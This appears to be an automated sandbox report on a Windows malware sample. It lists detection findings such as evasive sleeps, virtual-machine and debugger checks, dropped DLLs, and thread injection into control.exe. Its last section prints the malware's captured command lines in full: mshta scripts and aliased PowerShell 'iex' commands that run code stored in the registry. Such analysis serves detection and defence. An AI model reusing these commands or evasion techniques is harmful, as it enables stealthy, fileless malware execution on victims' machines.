Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep count: 5638 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep count: 3533 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408 Thread sleep count: 5347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328 Thread sleep count: 3944 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep count: 5671 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep count: 3636 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4968 Thread sleep time: -8301034833169293s >= -30000s
Found evasive API chain (date check)
Source: C:\Windows\System32\loaddll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5638
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3533
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3636
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_03B08B0F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_03B10219
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_03B016BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_048E16BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_048F0219
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_048E8B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_059116BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_05918B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_05920219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 6_2_009A0219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 6_2_00998B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 6_2_009916BA
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_03B08F03
Source: mshta.exe, 00000021.00000003.374607061.00000121EDD21000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: control.exe, 00000030.00000002.420216266.000002031134E000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_03B039B2
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0CE8 mov eax, dword ptr fs:[00000030h] 1_2_00FE0CE8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0A64 mov eax, dword ptr fs:[00000030h] 1_2_00FE0A64
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0C57 mov eax, dword ptr fs:[00000030h] 1_2_00FE0C57
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0BFC mov eax, dword ptr fs:[00000030h] 1_2_00FE0BFC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0B14 mov eax, dword ptr fs:[00000030h] 1_2_00FE0B14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960CE8 mov eax, dword ptr fs:[00000030h] 4_2_00960CE8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960C57 mov eax, dword ptr fs:[00000030h] 4_2_00960C57
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960A64 mov eax, dword ptr fs:[00000030h] 4_2_00960A64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960BFC mov eax, dword ptr fs:[00000030h] 4_2_00960BFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960B14 mov eax, dword ptr fs:[00000030h] 4_2_00960B14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0B14 mov eax, dword ptr fs:[00000030h] 5_2_031C0B14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0BFC mov eax, dword ptr fs:[00000030h] 5_2_031C0BFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0C57 mov eax, dword ptr fs:[00000030h] 5_2_031C0C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0A64 mov eax, dword ptr fs:[00000030h] 5_2_031C0A64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0CE8 mov eax, dword ptr fs:[00000030h] 5_2_031C0CE8
Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B02ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_03B02ABE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E2ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_048E2ABE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05912ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 5_2_05912ABE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00992ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 6_2_00992ABE

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 8DCB1580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
